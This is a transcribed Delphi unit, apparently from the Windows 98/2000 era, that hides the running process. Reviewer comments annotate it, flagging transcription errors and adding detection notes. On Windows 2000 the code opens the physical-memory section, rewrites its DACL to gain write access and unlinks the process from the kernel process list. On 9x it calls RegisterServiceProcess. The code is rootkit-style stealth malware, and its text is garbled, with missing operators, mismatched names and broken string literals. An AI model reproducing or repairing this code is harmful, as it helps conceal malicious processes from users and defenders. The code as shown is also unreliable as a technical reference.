Process-hiding Delphi code (Windows 98 / 2000 era), transcribed
Unit UNITHIDEPROCESS;
Interface
Uses
Windows, Messages, Sysutils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, Comctrls, Strutils, Stdctrls,
Toolwin, Menus, Imglist, Actnlist, Inifiles, Checklst, FileCtrl, ACLAPI,
Accctrl;
Type
// Aliases for the native-API (ntdll) types used by the declarations below.
// Transcribed verbatim; spacing and casing are as found on the page.
NTSTATUS = longint;
Ushort = byte;
Pwstr = pwidechar;
Ulong = cardinal
Handle = POINTER;
Pvoid = POINTER;
PCWSTR = PWIDECHAR;
Pulong = ^ ulong;
HMODULE = THANDLE;
Const
// NTSTATUS value that ZwOpenSection returns when the caller lacks the
// requested access; OpenPhysicalMemory branches on it to retry after a
// DACL rewrite.
Status_access_denied = $ c0000022;
// Flags passed to the Windows 9x-only kernel32 export RegisterServiceProcess
// (see HideProcess98). Only RSP_SIMPLE_SERVICE is used in this unit.
RSP_SIMPLE_SERVICE = $ 00000001;
Rsp_unregister_service = $ 00000000;
Type
// Counted wide string as expected by the native API (lengths in bytes).
_Unicode_string = record
Length: ushort;
MaximumLength: Ushort;
Buffer: pwstr;
END;
// NOTE(review): the alias below names `_unicore_string`, which does not match
// the record declared above; kept as transcribed.
Unicode_string = _unicore_string;
PUNICODE_STRING = ^ _Unicode_string;
// Native-API object descriptor: names the kernel object to open and carries
// an optional security descriptor / QoS pointer.
_Object_attributes = record
Length: ulong;
Rootdirectory: Handle;
Objectname: punicode_string;
Attributes: ulong;
SecurityDescriptor: PVOID;
SecurityQualityOfService: pvoid;
END;
// NOTE(review): the two aliases below use `_object_attribute` (singular),
// which does not match the record name above; kept as transcribed.
Object_attributes = _object_attribute;
POBJECT_ATTRIBUTES = ^ _ Object_attribute;
// Signature of ntdll!ZwOpenSection, resolved at run time via GetProcAddress.
// Opening a section object by name; desired access is an ACCESS_MASK.
Zwopensection = Function
SectionHandle: Pinteger;
DESIREDACCESS: Access_Mask;
Objectattributes: POBJECT_ATTRIBUTES
: NTSTATUS; STDCALL;
// Signature of ntdll!RtlInitUnicodeString: fills a UNICODE_STRING from a
// NUL-terminated wide string without copying the buffer.
RTLINITUNICODESTRING = Procedure
DestinationString: punicode_string;
SourceString: PCWSTR
STDCALL;
// Process-hiding helper. Create() records the target OS version; doHideme()
// dispatches to the Windows 98 path (RegisterServiceProcess) or the
// Windows 2000 path (patching kernel memory through the physical-memory
// section). Every kernel address and structure offset used by the 2000 path
// is hard-coded and build-specific.
// Defender note: the 2000 path is observable as a user-mode process that
// opens the physical-memory section, rewrites its DACL with SetSecurityInfo
// on a kernel object, and maps views of it with MapViewOfFile.
TMYHIDEPROCESS = Class
Private
// OS selector consumed by doHideme (98 or 2000).
Osversion: longint;
// ntdll exports resolved in initntdll.
RTLinitunicodeString: RTLINITUNICODESTRING;
// NOTE(review): declared as `Zwopense: Zwopense;` in the transcription; the
// implementation calls it as `zwopensection`. Kept verbatim.
Zwopense: Zwopense;
// Module handle for ntdll.dll; 0 when not loaded.
g_hntdll: hmodule;
// Base of the mapped physical-memory view used as the page-directory source.
g_pmapphysicalmemory: pvoid;
// Section handle for the physical-memory object.
g_hmpm: thandle;
Function initddll (): bool;
Procedure closentdll ();
// Grants section_map_write on the given section handle by editing its DACL.
Procedure SetPhyscialMemorySectionCanbewrite (HSECTION: THANDLE);
// Opens and maps the physical-memory section; returns the section handle or 0.
Function openphysicalmemory (): thandle;
// Virtual -> physical translation by walking page tables via the mapping.
Function lineArtophys (baseaddress: pulong; addr: pvoid): pvoid;
// Dword read / write at a kernel virtual address through the mapping.
Function getData (AddR: pvoid): ulong; function setdata (addr: pvoid; data: ulong): BOOL;
Function hideprocess2000 (): bool;
Procedure hideprocess98 ();
public
Constructor Create (Theosver: longint);
DEStructor destroy ();
Procedure dohideme ();
END;
IMPLEMENTATION
// Stores the OS selector (98 or 2000) that doHideme dispatches on.
// No resources are acquired here; ntdll is loaded lazily by initntdll.
Constructor TMYHIDEPROCESS.CREATE (THEOSVER: LongInt);
Begin
Osversion: = theosver;
END;
// Releases ntdll if it was loaded. Does not close g_hmpm or unmap
// g_pmapphysicalmemory; HideProcess2000 does that itself on its success path.
Destructor TMYHIDEPROCESS.DESTROY ();
Begin
Closentdll ();
END;
// Entry point: dispatches on the OS version given to Create. Any other value
// is a no-op. The BOOL result of HideProcess2000 is discarded here.
Procedure TmyHideProcess.doHideme ();
Begin
Case (Osversion) of
98:
HideProcess98 ();
2000:
HideProcess2000 ();
END;
END;
// Loads ntdll.dll and resolves the two native-API entry points used by the
// Windows 2000 path. Returns FALSE only when the library load fails; the
// GetProcAddress results are not checked, so a nil procedure pointer would
// only surface at the first call.
// NOTE(review): the class declares this method as `initddll` and the caller
// spells it `ifinitdll`; names are kept as transcribed.
Function TMYHIDEPROCESS.INITNTDLL (): BOOL;
VAR
a: longint;
Begin
// Reset all handles/pointers so a failed init leaves a consistent state.
g_hntdll: = 0;
g_pmapphysicalmemory: = nil;
g_hmpm: = 0;
g_hntdll: = loadingLibrary ('NTDLL.DLL');
IF (g_hntdll = 0) THEN
Begin
Result: = FALSE;
EXIT;
END;
// Assigning through `@` sets the procedure-pointer variables themselves.
@RtlinitunicodeString: =
GetProcaddress (g_hntdll, 'rtLinitUnicodestring');
@Zwopensection: =
GetProcaddress (g_hntdll, 'zwopensection');
RESULT: = TRUE;
END;
// Frees ntdll if loaded. The handle is not reset to 0 afterwards, so a second
// call would call FreeLibrary again on the same value.
// NOTE(review): declared as `closentdll` in the class; kept as transcribed.
Procedure tmyhideprocess.closeTdll ();
Begin
IF (g_hntdll <> 0) THEN
Begin
Freelibrary (g_hntdll);
END;
END;
// Edits the DACL of an already-open section handle so that the trustee named
// in EA receives section_map_write: reads the current DACL with
// GetSecurityInfo, merges one GRANT_ACCESS entry with SetEntriesInAcl and
// writes it back with SetSecurityInfo on SE_KERNEL_OBJECT. Any API failure
// jumps to cleanup; no error is reported to the caller.
// Defender note: a user-mode caller changing the DACL of a kernel section
// object is unusual; object-access auditing on the section (WRITE_DAC) is the
// natural place to observe it — confirm the audit configuration in use.
// NOTE(review): declared as `SetPhyscialMemorySectionCanbewrite` in the
// class; this implementation name is kept as transcribed.
Procedure TMYHIDEPROCESS.SETPHYSCIALMEMORYSECTIONCANBEWRITED (HSECTION: THANDLE);
Label Cleanup;
VAR
PDACL, PNEWDACL: PACL;
PSD: PPSecurity_Descriptor;
DWRES: DWORD;
EA: EXPLICIT_ACCESS;
Begin
PDACL: = NIL;
PNEWDACL: = NIL;
PSD: = NIL;
// Fetch the existing DACL; PSD receives the owning descriptor to free later.
DWRES: = GetSecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION,
NIL, NIL, PDACL, NIL, PSD);
IF (DWRES <> Error_Success) THEN
Begin
Goto cleanup;
END;
// One new ACE: grant section_map_write, no inheritance, trustee given by name.
ZeromeMory (@ea, sizeof (expected_access));
Ea.grfaccesspermissions: = section_map_write
Ea.grfaccessmode: = GRANT_ACCESS;
Ea.grfinheritance: = no_inheritance;
Ea.trustee.trusteeform: = trustee_is_name; ele.trustee.trustetype: = trustee_use_user;
Ea.trustee.ptstrname: = 'current_user';
// Merge the new ACE into a fresh DACL (PNEWDACL is LocalAlloc'd by the API).
DWRES: = STENTRIESINACL (1, @ EA, PDACL, PNEWDACL);
IF (DWRES <> Error_Success) THEN
Begin
Goto cleanup;
END;
// Apply the merged DACL to the section object.
Dwres: = setsecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION, NIL, NIL, PNEWDACL, NIL)
IF (DWRES <> Error_Success) THEN
Begin
Goto cleanup;
END;
// Release API-allocated memory on every exit path.
Cleanup:
IF (PSD <> nil) THEN
LocalFree (Ulong (PSD));
IF (PNewDACL <> nil) THEN
LocalFree (Ulong (PNewDACL);
END;
// Opens the physical-memory section by name via ZwOpenSection with map
// read+write access. On STATUS_ACCESS_DENIED it reopens the section with
// READ_CONTROL|WRITE_DAC, grants itself write access by rewriting the DACL,
// closes and reopens with the original mask. On success it maps a $1000-byte
// view at file offset $30000 into g_pmapphysicalmemory and returns the section
// handle; otherwise returns 0.
// Defender note: the sequence open -> WRITE_DAC reopen -> SetSecurityInfo ->
// MapViewOfFile on this section is the recognisable signature of this
// technique; later Windows releases refuse user-mode opens of the section
// outright — confirm for the OS versions in scope.
Function TMYHIDEPROCESS.OpenPhysicalMemory (): thandle;
VAR
Status: NTSTATUS;
Physmemstring: unicode_string;
Attributes: Object_attribute;
Begin
// Build the object name; the literal is garbled in the transcription.
RtlinitunicodeString (@physmemstring, pcwstr ('// device // physicalmemory ");
Attributes.lendth: = sizeof (Object_attributes);
Attributes.rootdirectory: = NIL;
Attributes.Objectname: = @physmemstring;
Attributes.attributes: = 0;
Attributes.securityDescriptor: = nil;
Attributes.securityquality = nil;
Status: = zwopensection (@ g_hmpm, section_map_read or section_map_write, @ attributes);
IF (status = status_access_denied) THEN
Begin
// Reopen with just enough access to change the DACL, grant map-write,
// then retry the original open. Status of the WRITE_DAC open is not checked.
Status: = zwopensection (@ g_hmpm, read_control or write_dac, @ attributes);
SetPhyscialMemorySectionCanbewrite (g_hmpm);
CloseHandle (G_HMPM);
Status: = zwopensection (@ g_hmpm, section_map_read or section_map_write, @ attributes);
END;
If status = 0 THEN
Begin
Result: = 0;
EXIT;
END;
// Map one page of the section; this view is later treated as the base for
// page-directory lookups in LinearToPhys.
g_pmapphysicalmemory: = MapViewOffile
g_hmpm,
4,
0,
$ 30000,
$ 1000);
IF (g_pmapphysicalmemory = nil) THEN
Begin
Result: = 0;
EXIT;
END;
Result: = g_hmpm;
END;
// ------------------------------------------------------------------------------
Type
// Open-ended dword array used to index into a mapped page by element. Call
// sites index far past the declared upper bound of 0, which only works with
// range checking disabled — TODO confirm the project's {$R} setting.
Tarrayulong = array [0..0] of ulong;
PTARRAYULONG = ^ tarrayulong;
// ------------------------------------------------------------------------------
// Translates a virtual address to a physical address by walking the page
// directory at BaseAddress and, when needed, one page table mapped from the
// physical-memory section. The shift/mask constants (shr 22, shr 12, $80 large
// page bit) correspond to the two-level 4 KiB-page x86 layout; PAE layouts are
// not handled. Returns 0 (as PVOID) when the directory or table entry is not
// present. The temporary page-table view is unmapped only on the success path.
// NOTE(review): the `+` between the masked halves of Paddr is missing in the
// transcription of both composition lines; kept verbatim.
Function TMYHIDEPROCESS.LINEARTOPHYS (BaseEaddress: pulong; addr: pvoid): PVOID;
VAR
VADDR, PGDE, PTE, PADDR, TMP: ULONG;
_PGDE: Pulong; Begin
Vaddr: = ulong (addr);
// Page-directory entry for the top 10 bits of the virtual address.
PGDE: = ptaRayulong (BaseAddress) ^ [VADDR SHR 22];
IF ((pgde and 1) <> 0) THEN
Begin
// Bit 7 set: large (4 MiB) page — physical address comes straight from the PDE.
TMP: = pgde and $ 00000080;
IF (TMP <> 0) THEN
Begin
Paddr: = (pgde and $ ffc00000) (Vaddr and $ 003FFFF);
end
Else
Begin
// Map the page table that the PDE points to and read the PTE for the
// middle 10 bits of the virtual address.
PGDE: = Ulong (MapViewoffile (G_HMPM, 4, 0, PGDE AND $ FFFFF000, $ 1000);
_PGDE: = Pulong (PGDE);
PTE: = ptarayulong (_pgde) ^ [(VADDR AND $ 003FF000) SHR 12];
IF ((PTE and 1) <> 0) THEN
Begin
Paddr: = (PTE and $ ffffff000) (VADDR and $ 00000FFF);
UnmapViewOffile (PVOID (PGDE));
end
Else
Begin
// PTE not present; the mapped page table is left mapped here.
Result: = 0;
EXIT;
END;
END;
end
Else
Begin
// PDE not present.
Result: = 0;
EXIT;
END;
Result: = PVOID (PADDR);
END;
// Reads one dword at a kernel virtual address: translates it to a physical
// address via LinearToPhys, maps the containing page of the physical-memory
// section read-only, fetches the dword at the page offset, unmaps and returns
// it. Returns 0 when the map step takes the early-exit branch.
FUNCTION
TMYHIDEPROCESS.GETDATA (AddR: pvoid): Ulong;
VAR
Phys, RET: ULONG;
TMP: Pulong;
Begin
Phys: = Ulong (lineartophys (pulong (g_pmapphysicalmemory), pvoid (addr));
// Map the 4 KiB page that contains Phys (page-aligned offset).
TMP: = Pulong (MapViewoffile (G_HMPM, 4, 0, Phys and $ FFFFF000, $ 1000));
IF (TMP <> nil) THEN
Begin
Result: = 0;
EXIT;
END;
// Dword index within the page.
RET: = PTARRAYULONG (TMP) ^ [(Phys and $ FFF) SHR 2];
UnmapViewoffile (TMP);
Result: = Ret;
END;
// Writes one dword at a kernel virtual address: same translation and page
// mapping as GetData, but the view is mapped with file_map_write and the
// dword at the page offset is overwritten. Returns FALSE when the map step
// takes the early-exit branch, TRUE otherwise.
// Defender note: a writable MapViewOfFile on the physical-memory section from
// user mode is the key observable for this write path.
Function TMYHIDEPROCESS.SETDATA (AddR: pvoid; data: ulong): BOOL
VAR
Phys, RET: ULONG;
TMP: Pulong;
Begin
Phys: = Ulong (lineartophys (pulong (g_pmapphysicalmemory), pvoid (addr));
// Writable view of the 4 KiB page containing Phys.
TMP: = Pulong (MapViewoffile (g_hmpm, file_map_write, 0, phys and $ fffff000, $ 1000));
IF (TMP <> nil) THEN
Begin
Result: = FALSE; EXIT;
END;
PTARRAYULONG (TMP) ^ [(Phys and $ FFF) SHR 2]: = DATA;
UnmapViewoffile (TMP);
RESULT: = TRUE
END;
// Windows 2000 path. After loading ntdll and opening/mapping the physical
// memory section, it reads a chain of pointers starting from a fixed kernel
// address, then rewrites two pointer fields of neighbouring records so that
// the current process's record is unlinked from a doubly-linked list
// (forward neighbour's back pointer := BW; back neighbour's forward pointer
// := FW). All addresses and offsets are hard-coded for one kernel build; on
// any other build the writes land on unrelated kernel memory.
// Returns FALSE only when OpenPhysicalMemory fails; returns TRUE otherwise,
// including when initdll fails and nothing was done.
// NOTE(review): the `+` operators in the four GetData/SetData address
// expressions are missing in the transcription; kept verbatim.
// Defender note: on the affected OS versions, any user-mode process mapping
// the physical-memory section writable is the detection point; integrity of
// the kernel process list can be cross-checked against other enumeration
// sources (e.g. handle tables or scheduler structures) — confirm tooling.
Function TMYHIDEPROCESS.HIDEPROCESS2000 (): BOOL;
VAR
Thread, Process, FW, BW: ulong;
Begin
ifinitdll () THEN
Begin
IF (OpenPhysicalMemory () = 0) THEN
Begin
Result: = FALSE;
EXIT;
END;
// Fixed kernel address -> current thread record -> owning process record.
Thread: = GetData (PVOID ($ FFDFF124));
Process: = GetData (PVOID (THREAD $ 22C));
// Forward and backward links of the process record.
FW: = GetData (PVOID (Process $ A0));
BW: = GetData (PVOID (Process $ A4));
// Splice the record out of the list by repointing its neighbours.
SetData (PVOID (FW 4), BW);
SetDATA (PVOID (BW), FW);
// Tear down the mapping, the section handle and ntdll.
UNMAPVIEWOFFILE (g_pmapphysicalmemory);
CloseHandle (G_HMPM);
Closentdll ();
END;
RESULT: = true;
END;
// Windows 9x path: resolves the kernel32 export RegisterServiceProcess at run
// time and calls it with RSP_SIMPLE_SERVICE, which on those systems marks the
// calling process as a service process (presumably the one hidden from the
// task list — confirm against 9x documentation). The GetProcAddress result
// is not checked before the call.
// NOTE(review): the call line `RegisterService (), RSP_SIMPLE_SERVICE;` is
// garbled in the transcription and is kept verbatim.
Procedure TmyhideProcess.hideProcess98 ();
TYPE PREGISTERSERVICE = Function (A, B: DWORD): Boolean; stdcall;
VAR
Hkernel: hmodule;
RegisterService: PregisterService;
Begin
Hkernel: = loadingLibrary ('kernel32.dll');
IF (Hkernel> 0) THEN
Begin
@RegisterService: = getProcaddress (Hkernel, 'registerServiceProcess ");
RegisterService (), RSP_SIMPLE_SERVICE;
// Release kernel32 reference taken by the explicit load.
Freelibrary (Hkernel);
Hkernel: = 0;
END;
END;
End.